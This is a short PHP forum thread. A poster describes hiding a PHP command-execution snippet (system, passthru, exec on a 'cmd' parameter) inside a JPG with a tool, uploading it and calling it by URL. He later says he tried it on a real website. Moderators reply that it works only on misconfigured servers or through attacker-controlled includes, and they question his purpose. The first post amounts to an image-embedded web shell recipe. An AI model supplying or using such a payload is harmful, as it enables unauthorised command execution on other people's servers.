Discussion of testing theory and practice, including methodologies (such as TDD, BDD, DDD, Agile, XP) and software - anything to do with testing goes here. (Formerly "The Testing Side of Development")
Moderator: General Moderators
M0TRIX
Forum Newbie
Posts: 2 Joined: Thu Jun 19, 2014 7:45 am
Post
by M0TRIX » Thu Jun 19, 2014 7:49 am
hello
follow the steps:
1_download edjpgcom.exe program.
2_drag the jpg file in the edjpgcom program the u can put your cods into the jpg file
3_put these codes into it :
Code: Select all
<?PHP
system($cmd);
passthru($cmd);
exec($cmd);
?>
>
4_upload the jpg file.
5_run it like this image.jpg?cmd=ls
do u think is it possible to run command with this method??? or other extense of image files like png gif etc..
Weirdan
Moderator
Posts: 5978 Joined: Mon Nov 03, 2003 6:13 pm
Location: Odessa, Ukraine
Post
by Weirdan » Thu Jun 19, 2014 12:19 pm
That's possible, however only if the webserver is misconfigured to process image files through php. Another exploit vector would exploiting attacker-controlled includes, but if that's possible it would itself be a security issue.
M0TRIX
Forum Newbie
Posts: 2 Joined: Thu Jun 19, 2014 7:45 am
Post
by M0TRIX » Thu Jun 19, 2014 5:00 pm
i've test it on a website.i just see the picture !!!but no command works!! why????there is php cod in it. it should work
i put <php and ?> characters in it.the webserver should recgnize it as a php file.huu??
is there any way to run our command with the picture??
so what is "edjpgcom.exe"(first post) program for?
Celauran
Moderator
Posts: 6425 Joined: Tue Nov 09, 2010 2:39 pm
Location: Montreal, Canada
Post
by Celauran » Thu Jun 19, 2014 6:47 pm
What are you trying to do here? Having shell_exec and/or exec enabled on a server is a pretty terrible idea.